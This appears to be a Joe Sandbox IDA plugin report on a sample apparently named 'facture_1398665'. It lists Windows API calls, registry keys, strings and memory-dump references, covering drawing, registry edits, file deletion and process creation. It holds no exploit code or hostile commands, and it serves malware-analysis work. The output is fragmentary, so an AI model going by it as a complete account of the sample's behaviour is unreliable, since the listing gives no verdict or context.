      • Part of subcall function 00432AFC: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00432D10
      • Part of subcall function 00432AFC: SetTextColor.GDI32(?,00431C22), ref: 00432D1A
      • Part of subcall function 00432AFC: SetBkColor.GDI32(?,00000000), ref: 00432D24
      • Part of subcall function 00432AFC: SelectObject.GDI32(?,00000000), ref: 00432D37
      • Part of subcall function 00432AFC: DeleteObject.GDI32(?), ref: 00432D40
      • Part of subcall function 00432AFC: SelectPalette.GDI32(?,00000000,00000000), ref: 00432D62
      • Part of subcall function 00432AFC: DeleteDC.GDI32(?), ref: 00432D6B
    • SelectObject.GDI32(?,00000000), ref: 0043520A
    • DeleteDC.GDI32(00000000), ref: 00435219
    • AlphaBlend.MSIMG32(00000000,?,?,?,?,?,00000000,00000000,?,00000000,00000000,?,0000000E,00000000,?,0000000C), ref: 00435278
    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004352B8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • CreateCompatibleDC.GDI32(00000000), ref: 00432973
    • CreateCompatibleDC.GDI32(00000000), ref: 0043297D
    • GetObjectW.GDI32(?,00000018,?), ref: 0043299D
    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004329B4
    • GetDC.USER32(00000000), ref: 004329C0
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004329ED
    • ReleaseDC.USER32(00000000,00000000), ref: 00432A13
      • Part of subcall function 004328A4: GetLastError.KERNEL32(00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000,00000000,00434D0B,?,00000000,00000054,?,00000000), ref: 004328C4
      • Part of subcall function 004328A4: FormatMessageW.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000), ref: 004328EA
    • SelectObject.GDI32(?,?), ref: 00432A2E
    • SelectObject.GDI32(?,00000000), ref: 00432A3D
    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00432A69
    • SelectObject.GDI32(?,00000000), ref: 00432A77
    • SelectObject.GDI32(?,00000000), ref: 00432A85
    • DeleteDC.GDI32(?), ref: 00432A9B
    • DeleteDC.GDI32(?), ref: 00432AA4
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetWindowDC.USER32(00000000), ref: 00464A9C
    • GetClientRect.USER32(00000000,?), ref: 00464ABF
    • GetWindowRect.USER32(00000000,?), ref: 00464AD1
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00464AE7
    • ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00464B12
    • InflateRect.USER32(?,00000000,00000000), ref: 00464B30
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00464B4A
    • DrawEdge.USER32(?,?,?,00000008), ref: 00464C4D
    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00464C66
    • GetRgnBox.GDI32(?,?), ref: 00464C9C
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00464CB2
      • Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7
    • FillRect.USER32(?,?,00000000), ref: 00464CEE
    • ReleaseDC.USER32(00000000,?), ref: 00464D0D
      • Part of subcall function 0046B708: GetWindowLongW.USER32(00000000,000000EC), ref: 0046B723
      • Part of subcall function 0046B708: GetWindowRect.USER32(00000000,?), ref: 0046B73E
      • Part of subcall function 0046B708: GetWindowDC.USER32(00000000), ref: 0046B75E
      • Part of subcall function 0046B708: GetWindowLongW.USER32(00000000,000000F0), ref: 0046B78F
      • Part of subcall function 0046B708: GetSystemMetrics.USER32(00000002), ref: 0046B7A4
      • Part of subcall function 0046B708: GetSystemMetrics.USER32(00000003), ref: 0046B7AD
      • Part of subcall function 0046B708: InflateRect.USER32(?,000000FE,000000FE), ref: 0046B7BC
      • Part of subcall function 0046B708: GetSysColorBrush.USER32(0000000F), ref: 0046B7E9
      • Part of subcall function 0046B708: FillRect.USER32(?,?,00000000), ref: 0046B7F7
      • Part of subcall function 0046B708: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0046B81C
      • Part of subcall function 0046B708: ReleaseDC.USER32(00000000,?), ref: 0046B858
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,004AF4B6,?,?,00000003,00000000,00000000,004AF4FA), ref: 004AF335
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,004AF3F4,?,?,00000000,00000000,?,00000000,?,00000000), ref: 004AF3B6
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,004AF3F4,?,?,00000000,00000000,?,00000000,?,00000000), ref: 004AF3DD
    • RegDeleteValueW.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF4B6,?,?,00000003,00000000,00000000,004AF4FA), ref: 004AF428
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF4B6), ref: 004AF47A
    • RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000004,?,00000000,00000000,?,00000000,?,00000000,004AF4B6,?,?), ref: 004AF49A
    • RegCloseKey.ADVAPI32(?,004AF4BD,00000001,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF4B6), ref: 004AF4B0
      • Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    Strings
    • RegOpenKeyEx, xrefs: 004AF2B1
    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AF255
    • , xrefs: 004AF2A8
    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AF28E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004B4814: RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,004B4800,00000003,00000000,004B49B7,00000000,004B4B71,?,004B4800,?,00000000,00000000), ref: 004B4861
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004B4B71,?,004B4800,?,00000000,00000000,00000000,?,?,004B4DDC,00000000), ref: 004B4A15
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004B4B71,?,004B4800,?,00000000,00000000,00000000,?,?,004B4DDC,00000000), ref: 004B4A7F
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,004B4B71,?,004B4800,?,00000000,00000000,00000000,?), ref: 004B4AE6
    Strings
    • v1.1.4322, xrefs: 004B4AD8
    • v2.0.50727, xrefs: 004B4A71
    • v4.0.30319, xrefs: 004B4A07
    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004B4A33
    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004B4A9A
    • .NET Framework not found, xrefs: 004B4B32
    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004B49C9
    • .NET Framework version %s not found, xrefs: 004B4B1E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • CloseHandle.KERNEL32(?), ref: 004B3C6F
    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004B3C8B
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 004B3C99
    • GetExitCodeProcess.KERNEL32(?), ref: 004B3CAA
    • CloseHandle.KERNEL32(?), ref: 004B3CF1
    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 004B3D0D
    Strings
    • Helper process exited., xrefs: 004B3CB9
    • Helper process exited with failure code: 0x%x, xrefs: 004B3CD7
    • Stopping 64-bit helper process. (PID: %u), xrefs: 004B3C61
    • Helper isn't responding; killing it., xrefs: 004B3C7B
    • Helper process exited, but failed to get exit code., xrefs: 004B3CE3
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FindWindowW.USER32(MouseZ,Magellan MSWHEEL), ref: 0040A194
    • RegisterWindowMessageW.USER32(MSWHEEL_ROLLMSG), ref: 0040A1A0
    • RegisterWindowMessageW.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0040A1AF
    • RegisterWindowMessageW.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0040A1BB
    • SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040A1D3
    • SendMessageW.USER32(00000000,?,00000000,00000000), ref: 0040A1F7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FCE8: RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0047FD14
    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004AF007,?,00000000,004AF0E1), ref: 004AEF57
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000004,?,?,00000000,?,00000000,?,00000000,004AF007,?,00000000), ref: 004AEFBD
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000004,?,?,00000000,?,00000000,?,00000000,004AF007,?,00000000), ref: 004AEFEF
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF007,?,00000000,004AF0E1), ref: 004AF07B
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,00000000,00000004,?,00000000,?,00000000,004AF007,?,00000000,004AF0E1), ref: 004AF096
    • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF007,?,00000000), ref: 004AF09F
      • Part of subcall function 0048087C: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,004AA95E,00000000,004AA9AF,?,004AAB90), ref: 0048089B
    Strings
    • RegCreateKeyEx, xrefs: 004AEEC4
    • , xrefs: 004AEEBB
    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AEE71
    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004AEEA1
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042E02D
    • GetSystemMetrics.USER32(00000000), ref: 0042E052
    • GetSystemMetrics.USER32(00000001), ref: 0042E05D
    • GetClipBox.GDI32(?,?), ref: 0042E06F
    • GetDCOrgEx.GDI32(?,?), ref: 0042E07C
    • OffsetRect.USER32(?,?,?), ref: 0042E095
    • IntersectRect.USER32(?,?,?), ref: 0042E0A6
    • IntersectRect.USER32(?,?,?), ref: 0042E0BC
    • IntersectRect.USER32(?,?,?), ref: 0042E0DC
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004115CC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00411778), ref: 004115FF
      • Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00411623
      • Part of subcall function 004115CC: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 0041163E
      • Part of subcall function 004115CC: LoadStringW.USER32(00000000,0000FFE8,?,00000100), ref: 004116D9
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004118DD), ref: 00411819
    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041184C
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041185E
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 00411864
    • GetStdHandle.KERNEL32(000000F4,004118F8,00000002,?,00000000,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00411878
    • WriteFile.KERNEL32(00000000,000000F4,004118F8,00000002,?), ref: 0041187E
    • LoadStringW.USER32(00000000,0000FFE9,?,00000040), ref: 004118A2
    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 004118BC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetFileAttributesW.KERNEL32(00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000,?,004D22DB,00000000,00000000,00000000), ref: 004D1F64
      • Part of subcall function 0047EBB4: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0047EC2A
      • Part of subcall function 0047EBB4: GetProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,00000100), ref: 0047EC57
    • DeleteFileW.KERNEL32(00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000,?,004D22DB), ref: 004D1FBF
    • DeleteFileW.KERNEL32(00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000,00000000), ref: 004D1FE2
    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000,00000000), ref: 004D1FFB
    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0050BCD4,00000000,00000000,004D2021,?,004D6390,00000009,00000000,00000000,00000000), ref: 004D2001
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetWindowLongW.USER32(00000000,000000EC), ref: 0046B723
    • GetWindowRect.USER32(00000000,?), ref: 0046B73E
    • GetWindowDC.USER32(00000000), ref: 0046B75E
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0046B78F
    • GetSystemMetrics.USER32(00000002), ref: 0046B7A4
    • GetSystemMetrics.USER32(00000003), ref: 0046B7AD
    • InflateRect.USER32(?,000000FE,000000FE), ref: 0046B7BC
    • GetSysColorBrush.USER32(0000000F), ref: 0046B7E9
    • FillRect.USER32(?,?,00000000), ref: 0046B7F7
    • ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0046B81C
    • ReleaseDC.USER32(00000000,?), ref: 0046B858
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • LoadCursorW.USER32(00000000,00007F02), ref: 004C0153
    • SetCursor.USER32(00000000), ref: 004C0159
    • SetCursor.USER32(00000001), ref: 004C01C3
      • Part of subcall function 004C0490: SendMessageW.USER32(00000000,0000113F,00000000), ref: 004C04B8
      • Part of subcall function 0042E294: SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 0042E2A3
    • SendMessageW.USER32(00000000,0000113F,00000000,00000001), ref: 004C0349
    • SendMessageW.USER32(00000000,00001113,00000000,00000000), ref: 004C0373
      • Part of subcall function 004BFF68: GetMessagePos.USER32 ref: 004BFF70
      • Part of subcall function 004BFF68: SendMessageW.USER32(00000000,00001111,00000000,?), ref: 004BFFC2
      • Part of subcall function 004BFF68: SendMessageW.USER32(00000000,00001102,00000003,00000000), ref: 004BFFE9
      • Part of subcall function 004BFF68: SendMessageW.USER32(00000000,00001102,00000002,00000000), ref: 004C003E
    • SendMessageW.USER32(00000000,0000113E,00000000,00000008), ref: 004C03FB
      • Part of subcall function 0042E2C4: SendMessageW.USER32(00000000,0000110A,00000003), ref: 0042E2D3
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AE0F8: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 004AE1E3
      • Part of subcall function 004AE0F8: CloseHandle.KERNEL32(00000000), ref: 004AE1F3
    • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 004FC62F
    • DestroyWindow.USER32(?), ref: 004FC75D
      • Part of subcall function 004FBABC: GetLastError.KERNEL32(00000000,004FBB57,?,?,?), ref: 004FBADF
      • Part of subcall function 004AE5E8: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004AE6CE
    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,004FC79A), ref: 004FC656
      • Part of subcall function 0040A124: CreateWindowExW.USER32(00000000,TWindowDisabler-Window,00000000,0048159E,?,?,?,00000001,00000000,?,W3K,?), ref: 0040A163
    • SetWindowLongW.USER32(?,000000FC,004FBC7C), ref: 004FC690
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004FC6C5
      • Part of subcall function 0047F29C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F), ref: 0047F2D1
      • Part of subcall function 0047F29C: GetCommandLineW.KERNEL32(00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F,?,?,?,?,00000000), ref: 0047F2E7
      • Part of subcall function 0047F17C: GetCommandLineW.KERNEL32(00000000,0047F1BE,?,00000000,00000000,?,004E2AD9,-00000010,?,00000004,0000001C,00000000,004E2CF7,?,004B9C20,00000000), ref: 0047F192
      • Part of subcall function 004FBB64: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,004FC763), ref: 004FBBD1
      • Part of subcall function 004FBB64: CloseHandle.KERNEL32(?), ref: 004FBBEE
      • Part of subcall function 004FBC40: TranslateMessage.USER32 ref: 004FBC56
      • Part of subcall function 004FBC40: DispatchMessageW.USER32 ref: 004FBC5C
      • Part of subcall function 004FBC40: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004FBC6A
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004FC739
    • CloseHandle.KERNEL32(?), ref: 004FC747
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,004B40CB,?,00000000,004B4126,?,?,01469C60,00000000), ref: 004B3F45
    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,01469C60,?,00000000,004B4060,?,00000000,000000FF,00000000,00000000,00000000,004B40CB), ref: 004B3FA2
    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,01469C60,?,00000000,004B4060,?,00000000,000000FF,00000000,00000000,00000000,004B40CB), ref: 004B3FAF
    • GetLastError.KERNEL32(?,?,00000000,000000FF,004B4039,01469C60,00000000), ref: 004B402C
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004B3FFB
    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,004B4039,01469C60,00000000), ref: 004B4025
    • CloseHandle.KERNEL32(00000000), ref: 004B405A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AAC74: SetEndOfFile.KERNEL32(?,?,004B8267,00000000,004B83F9,?,00000000,00000002,00000002), ref: 004AAC7B
    • DeleteFileW.KERNEL32(00000000), ref: 004FBD37
    • DeleteFileW.KERNEL32(00000000,00000000), ref: 004FBD54
    • GetWindowThreadProcessId.USER32(00000000,?), ref: 004FBD89
    • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?,00000000,00000000), ref: 004FBD9D
    • SendNotifyMessageW.USER32(00000000,0000054D,00000000,00000000), ref: 004FBDB7
